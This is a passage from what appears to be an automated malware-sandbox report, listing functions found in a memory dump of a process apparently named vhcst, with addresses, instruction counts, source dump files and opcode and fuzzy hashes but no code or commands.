                                                                                      • Instruction Fuzzy Hash: 32112621F1CD1D0FEAB4EF6C54AA67977C1EF9C219B0402BAE44DC3296DC26AC4143C2
                                                                                      Function 00007FFD99E286AF Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: sU
                                                                                      • API String ID: 0-4213316562
                                                                                      • Opcode ID: d296933867886b5c677a58159e8c5d8a0d331d6d1e34ef4ab820e7d58896cfdb
                                                                                      • Instruction ID: 443c27f6093ffba0ea2522c1acf31af6962947f32cea8d07f808ead0afefe8a2
                                                                                      • Opcode Fuzzy Hash: d296933867886b5c677a58159e8c5d8a0d331d6d1e34ef4ab820e7d58896cfdb
                                                                                      • Instruction Fuzzy Hash: 5411A52071CD091FE7ACEA2C8859E6577D1FBA8314B10027EE04EC3697EE21FC058385
                                                                                      Function 00007FFD99E21D8A Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3N_^
                                                                                      • API String ID: 0-537166758
                                                                                      • Opcode ID: 52a64daabfdf5d4986858cfa427a38322d2c2c9ccc639a335157e521179577e2
                                                                                      • Instruction ID: 8c708be08359478cdaeca866ac067aecbde0cded6bc06ea803d91f3305444117
                                                                                      • Opcode Fuzzy Hash: 52a64daabfdf5d4986858cfa427a38322d2c2c9ccc639a335157e521179577e2
                                                                                      • Instruction Fuzzy Hash: 2FC01212B4EF0A45EEA45988B4A1AFDB3C0EBB0255F840276E0488519ADC1B76C74287
                                                                                      Function 00007FFD99E1DB93 Relevance: .8, Instructions: 778COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4ba21e2510a089266cd5097816711fbee3c52aca19669390e417dd01cae0f35e
                                                                                      • Instruction ID: fe5abbad6f74ad6d3fc50172231f94da6874bdae1ed7d7769681f56b36428b1c
                                                                                      • Opcode Fuzzy Hash: 4ba21e2510a089266cd5097816711fbee3c52aca19669390e417dd01cae0f35e
                                                                                      • Instruction Fuzzy Hash: BF427E6160E6C55FE717E7B818B65EDBFE1DF0B120B8C09EEC4C68B1A3C8196546C346
                                                                                      Function 00007FFD99E1E6F5 Relevance: .7, Instructions: 737COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eda3f418b78aa242fddd3e41dda601972702dd70cb41b3c680c2e0a52d038efd
                                                                                      • Instruction ID: 08df61879a331ebcd5fdc622cf1db3103a474e203372cc07cb00db3f4472fb28
                                                                                      • Opcode Fuzzy Hash: eda3f418b78aa242fddd3e41dda601972702dd70cb41b3c680c2e0a52d038efd
                                                                                      • Instruction Fuzzy Hash: 2E42A730709A4E8FDBA4EF18C8A5AA977E1FF68304B54456DE41EC7296CE35EC42CB41
                                                                                      Function 00007FFD99E173DB Relevance: .7, Instructions: 687COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3270543d511066f8892bd8c4c08c54a00626f3046778dcab8e8550e4247eed16
                                                                                      • Instruction ID: e38ae76b878b40fb6ff5975ad5a115cd3016225e5d431ce9b6190797cc572fcb
                                                                                      • Opcode Fuzzy Hash: 3270543d511066f8892bd8c4c08c54a00626f3046778dcab8e8550e4247eed16
                                                                                      • Instruction Fuzzy Hash: 13226F51B0F6CA0FE776AB7818756E57FE0EF46628B4805FED0898B0E7DC1A6905C342
                                                                                      Function 00007FFD99E21428 Relevance: .6, Instructions: 606COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63bd2a3491658169decfa50549fc245c6c61f90843873d66f676d60c50dd1368
                                                                                      • Instruction ID: 2321f1f436ca86172329010a84268323f583f1db73b93dacd4901339f5b595c9
                                                                                      • Opcode Fuzzy Hash: 63bd2a3491658169decfa50549fc245c6c61f90843873d66f676d60c50dd1368
                                                                                      • Instruction Fuzzy Hash: 2F22E530B09A8E8FDB94EF58C8A4AAA77E1FF59304F1445A9D41DC72D6CA35EC42CB41
                                                                                      Function 00007FFD99E21F09 Relevance: .6, Instructions: 583COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3661c2cfc87dfcadc1879f8291e23afd8b01fb592549bf9484e18a132af8a3de
                                                                                      • Instruction ID: 5d11e42caba43f0c323e1ced411ea6f42a1c660d81dfa76e404438a4c3bc9e22
                                                                                      • Opcode Fuzzy Hash: 3661c2cfc87dfcadc1879f8291e23afd8b01fb592549bf9484e18a132af8a3de
                                                                                      • Instruction Fuzzy Hash: E712A530B09A4E8FDB98EF58C8A4ABA77E1FF58304F5445A9D41DC7396CA35E842CB41
                                                                                      Function 00007FFD99E568B0 Relevance: .5, Instructions: 494COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 61536a9fcf0664e0b37c3de4e64d7459aa44d56344c3e19399c52678a42a1bf9
                                                                                      • Instruction ID: 282664ae5266d2e4dd957306823ce09d29df5cf989e6c88834394c49e86cafd8
                                                                                      • Opcode Fuzzy Hash: 61536a9fcf0664e0b37c3de4e64d7459aa44d56344c3e19399c52678a42a1bf9
                                                                                      • Instruction Fuzzy Hash: 6EE10920B0DA854FEB6CDF6C98A5AB93BD1EF59314F0440BEE44DC71A7DD25AC428346
                                                                                      Function 00007FFD99E5B478 Relevance: .5, Instructions: 479COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 33ef876e90da774157cdd2351cff3a094cf40e73a44c08cd91db12e383797b57
                                                                                      • Instruction ID: b3889e1ac292d076da7f4264e94792f908c67094230145a5ce530681d1f275fe
                                                                                      • Opcode Fuzzy Hash: 33ef876e90da774157cdd2351cff3a094cf40e73a44c08cd91db12e383797b57
                                                                                      • Instruction Fuzzy Hash: 11E1B531B0A91A4FDBB4DE59D0E067573D2EF98319B5441B9C04DC729ACE26FC82C782
                                                                                      Function 00007FFD99E1DF16 Relevance: .5, Instructions: 479COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e5e07e1071180fbe545d538ab552e014eba9e392c2284b8ddead6395964446c9
                                                                                      • Instruction ID: 54b807ec811eca6f1ff8d17bfc1e98ac33d21c56e1939b9c40535f1e1f51ca23
                                                                                      • Opcode Fuzzy Hash: e5e07e1071180fbe545d538ab552e014eba9e392c2284b8ddead6395964446c9
                                                                                      • Instruction Fuzzy Hash: DBF11531A0E6C90FE717DBB818B65EDBFE1EF4B214B4805EDD4CA8B1A3C9196546C342
                                                                                      Function 00007FFD99E1CF4D Relevance: .4, Instructions: 429COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 54df2c461cc46f344fc7f8b73b2c05e27360e24554ce83a868980013b17b0d51
                                                                                      • Instruction ID: a85beb909767e68d88538846e64ef436bc47a713efd72b325605f59643bc7c3d
                                                                                      • Opcode Fuzzy Hash: 54df2c461cc46f344fc7f8b73b2c05e27360e24554ce83a868980013b17b0d51
                                                                                      • Instruction Fuzzy Hash: 20C10912F0E6954FD766BBA868755FA7FE0DF8222CB0C41B7D09DCA0E7DC0924468386
                                                                                      Function 00007FFD99E254CC Relevance: .4, Instructions: 409COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 96ef8f2df18f6257177131ce297e841aac8cf09b2fa35b2b3bfd4234010161ff
                                                                                      • Instruction ID: f7da6085a74f08880f53be451e24c981f1fb6fb6521a6e5322b719ddba54bc7f
                                                                                      • Opcode Fuzzy Hash: 96ef8f2df18f6257177131ce297e841aac8cf09b2fa35b2b3bfd4234010161ff
                                                                                      • Instruction Fuzzy Hash: E0D17C21A0E6C94FD7279BB488A55E97FF0EF46314F4805FAC48ACB0A3DD1D65468383
                                                                                      Function 00007FFD99E1F468 Relevance: .4, Instructions: 407COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 189d1b31e19ce7bd1ea5620910ef4496e285a88a4997aed87fb37b076d5dd37d
                                                                                      • Instruction ID: 6c2dc2b3c4900654e00d3a47b54541faaf5a516d16944bb0d7452e64d8620129
                                                                                      • Opcode Fuzzy Hash: 189d1b31e19ce7bd1ea5620910ef4496e285a88a4997aed87fb37b076d5dd37d
                                                                                      • Instruction Fuzzy Hash: 50C13810B1E6450FFB69AE6850A62BC77D1EF86714F5442BFD08BC71DBDC2A78424207
                                                                                      Function 00007FFD99E286A5 Relevance: .4, Instructions: 405COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a963e0048cd86a0c62d14a5997edb602e24dfa5778b4725fddd428773a212b5c
                                                                                      • Instruction ID: 1004bb636ade6d8cd953148056ee1403a6fe69075cc8ed558771e1725d13a074
                                                                                      • Opcode Fuzzy Hash: a963e0048cd86a0c62d14a5997edb602e24dfa5778b4725fddd428773a212b5c
                                                                                      • Instruction Fuzzy Hash: 01C1C021B1EE4F1FEAF8DE5948F453577D1EF68A08B4804BAD84EC7597DD1AEC018282
                                                                                      Function 00007FFD99E13E99 Relevance: .4, Instructions: 377COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a0d2c10c1cf3619b2f617c3b248cf445bfaf77443950957e1afd99ca5beee9c
                                                                                      • Instruction ID: ee8c850b2f2edb695bdc239b829753cececf66b911d7767e6aff704212d55d04
                                                                                      • Opcode Fuzzy Hash: 1a0d2c10c1cf3619b2f617c3b248cf445bfaf77443950957e1afd99ca5beee9c
                                                                                      • Instruction Fuzzy Hash: B5C14731B0D68A4FEBA5DF6888A56F97BE1FF49314F04017AD05DC72D2DE29A806C742
                                                                                      Function 00007FFD99E286F8 Relevance: .4, Instructions: 370COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cadec5f7fba899a0aa23aca42147db24ecf1c886d2abcbe6811dfd98df6e1a87
                                                                                      • Instruction ID: 331d44a9ce8f4b0f20f6ffad355f570fdd4a5e1e5a166f610f100f0cd5bc90c3
                                                                                      • Opcode Fuzzy Hash: cadec5f7fba899a0aa23aca42147db24ecf1c886d2abcbe6811dfd98df6e1a87
                                                                                      • Instruction Fuzzy Hash: 22B1C330B1DA094FDBA8EF6884A5A7573E1FF98318F54057ED44EC3296DE25F8428782
                                                                                      Function 00007FFD99E2CF24 Relevance: .4, Instructions: 353COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8c7c740eb733751f61b97c7a185635bfa8104e736d7b740e1fe7213bb2516895
                                                                                      • Instruction ID: 4564577c72726f6dabcdd146ba086c76a9aedf4d0c87ea9bba6a04569caed036
                                                                                      • Opcode Fuzzy Hash: 8c7c740eb733751f61b97c7a185635bfa8104e736d7b740e1fe7213bb2516895
                                                                                      • Instruction Fuzzy Hash: BCB17371B18E498FDB58EF18D8919A573E1FF68304714416EE05EC36AADE35F842CB82
                                                                                      Function 00007FFD99E25156 Relevance: .4, Instructions: 352COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7dbf248c0c502b7fe84a76b3f63aecf73433fe6376dfcd1d6c8c5a05d796d4d8
                                                                                      • Instruction ID: d7dcf08fdfcacc551c659efa5eec4d6eafd6ba5f347bcc16b3bea8b1eb424d8b
                                                                                      • Opcode Fuzzy Hash: 7dbf248c0c502b7fe84a76b3f63aecf73433fe6376dfcd1d6c8c5a05d796d4d8
                                                                                      • Instruction Fuzzy Hash: D6C11D30718A4E8FDB98EF18C4A4AA973E2FF98314B5445A9D41EC7296CF35E852CB41
                                                                                      Function 00007FFD99E63D38 Relevance: .4, Instructions: 351COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe13fb7c1ccd9a51597c6debefd728b7b8da4307773eb4731f46418eed06fa6d
                                                                                      • Instruction ID: b75fae88d0c0d8678ac729b97e9abb796ff8df89874a3fcc4769d97b66346ea0
                                                                                      • Opcode Fuzzy Hash: fe13fb7c1ccd9a51597c6debefd728b7b8da4307773eb4731f46418eed06fa6d
                                                                                      • Instruction Fuzzy Hash: 72C16E30B19A4A8FEBA4DE68C4A877677D1FF54318F544479C44E865C6CE3AF882C741
                                                                                      Function 00007FFD99E286CD Relevance: .3, Instructions: 332COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e580f118d8eb7dc2afdd9fcefad767427c508db7576bd3960bfa45e90845554
                                                                                      • Instruction ID: 0316eed508320f1eb8ec14bf465a1fd2f40ecf97425f4e05e403f8e33c11e0f0
                                                                                      • Opcode Fuzzy Hash: 0e580f118d8eb7dc2afdd9fcefad767427c508db7576bd3960bfa45e90845554
                                                                                      • Instruction Fuzzy Hash: A8A1A630B19A088FDF98EF98C495AB877E1FF59315B5401B9D449C72A2DE25FC42CB42
                                                                                      Function 00007FFD99E30988 Relevance: .3, Instructions: 330COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dc050ecfc22dce75ff40bed907ecc446e89c37b7591ecd61065ef662e035cd18
                                                                                      • Instruction ID: fe71c08aaf6bc75218cbb5b7b111575215a133b155cedeb8161297e925677211
                                                                                      • Opcode Fuzzy Hash: dc050ecfc22dce75ff40bed907ecc446e89c37b7591ecd61065ef662e035cd18
                                                                                      • Instruction Fuzzy Hash: 2591783161EB458FD728DE5C98D69B177D0EB95329B14017ED48EC32A2DD26BC47C382
                                                                                      Function 00007FFD99E2BB25 Relevance: .3, Instructions: 325COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3191c79d4bba24028cc71efff42514054230408e0ff0d52662a7318d7572e3c1
                                                                                      • Instruction ID: 84dfd0d1650a1133e390a39ec328c4b1a1d8aceef745423c048bb8d4c400679b
                                                                                      • Opcode Fuzzy Hash: 3191c79d4bba24028cc71efff42514054230408e0ff0d52662a7318d7572e3c1
                                                                                      • Instruction Fuzzy Hash: 8F917C32B0DA4A4FD719FE6898558F977D0EF65318B0846BED05EC309BED15B8078382
                                                                                      Function 00007FFD99E3054C Relevance: .3, Instructions: 310COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c48203369acaba92b0aa0af587b7e7aea4cd13e924d26a3820a62b1b4f8ff976
                                                                                      • Instruction ID: 53b98d0f80f5f0c3e6e0ba8d8ee625f1278d579f124b045e05b934a087184699
                                                                                      • Opcode Fuzzy Hash: c48203369acaba92b0aa0af587b7e7aea4cd13e924d26a3820a62b1b4f8ff976
                                                                                      • Instruction Fuzzy Hash: D1816F62B19E8D4FDB64EE3888669F5B7D1EFB534870406BFD04AC71E6DD29A802C341
                                                                                      Function 00007FFD99E23D14 Relevance: .3, Instructions: 304COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c28cb0c1bf22230d6beed2be013b8bc5a0ef5a29c7b7ec6713ab1c123944b37b
                                                                                      • Instruction ID: c0d3d24c5f89f63a254c15647865e625a80326e7afa9a8a3c33afcb486780aa5
                                                                                      • Opcode Fuzzy Hash: c28cb0c1bf22230d6beed2be013b8bc5a0ef5a29c7b7ec6713ab1c123944b37b
                                                                                      • Instruction Fuzzy Hash: 1C911421A0E7C90FE7639BB458655E97FF0EF47624F0901FBD488CB0A3D91A690A8753
                                                                                      Function 00007FFD99E28214 Relevance: .3, Instructions: 303COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b43d6879df2caecaab5c971f87e3d2223afb09de7331d6b980e17b8357727713
                                                                                      • Instruction ID: e0c6560c3717c70daacec5461a4e9f85516b3161e46e01a68eb581979ca4748e
                                                                                      • Opcode Fuzzy Hash: b43d6879df2caecaab5c971f87e3d2223afb09de7331d6b980e17b8357727713
                                                                                      • Instruction Fuzzy Hash: 8091F42190E6CD0FF7629BB458651E9BFF0EF56214F4901FBD488CB4A3D91A291A8783
                                                                                      Function 00007FFD99E3ECE0 Relevance: .3, Instructions: 303COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b64e6e504e975505b3aa9280a6fbada02fbe80e62ebf2ce6693e57f8ef00cd5
                                                                                      • Instruction ID: f682202f41691bacff0e8d550dd7f644f6a036d6931f8668cfcf993a80ff7488
                                                                                      • Opcode Fuzzy Hash: 1b64e6e504e975505b3aa9280a6fbada02fbe80e62ebf2ce6693e57f8ef00cd5
                                                                                      • Instruction Fuzzy Hash: 38912931719A454FE328DF18D8925B1B3E1FFA5318B5405BDE48BC7292DE26FC428782
                                                                                      Function 00007FFD99E27844 Relevance: .3, Instructions: 297COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a42e04aed071b2617e87b19f530e6703e70e406161494958c34e6a6ce6d16b9
                                                                                      • Instruction ID: c879019a951dcdeceff81c04fc0f721855909684bbbe982a4c25a5479a8ad3ae
                                                                                      • Opcode Fuzzy Hash: 3a42e04aed071b2617e87b19f530e6703e70e406161494958c34e6a6ce6d16b9
                                                                                      • Instruction Fuzzy Hash: 1E91086190E7C90FE7629BB458655E97FF4DF47224F0901FBD498CB0A3D91A6A0A8383
                                                                                      Function 00007FFD99E21C8D Relevance: .3, Instructions: 295COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 05cfe536e22e8cb78a9b6c676aca3853fe992dc14cade4170e87cf395e02841e
                                                                                      • Instruction ID: f2b6dae39bc377c4dedab8a95a562d01cdac39c624af301eab3516b8ccbaf94c
                                                                                      • Opcode Fuzzy Hash: 05cfe536e22e8cb78a9b6c676aca3853fe992dc14cade4170e87cf395e02841e
                                                                                      • Instruction Fuzzy Hash: 2881F732A0E6C94FEB669BB45C755ED7FE0DF46215F0801FBD488CB093D91A264A8383
                                                                                      Function 00007FFD99E291C9 Relevance: .3, Instructions: 289COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0388a2a9cda5cc1a4ec9fb96196745bc83d49a5881555f585f7aa7669759ac15
                                                                                      • Instruction ID: 698c65edf8af1a7ae6dae66f7c2e5d86905baa81e7b182f31414448b663cca16
                                                                                      • Opcode Fuzzy Hash: 0388a2a9cda5cc1a4ec9fb96196745bc83d49a5881555f585f7aa7669759ac15
                                                                                      • Instruction Fuzzy Hash: 8F810622A0E6C90FE7629B7458751EDBFE0EF46215F1811FAD498CB0D3D91A691AC383
                                                                                      Function 00007FFD99E170F9 Relevance: .3, Instructions: 289COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
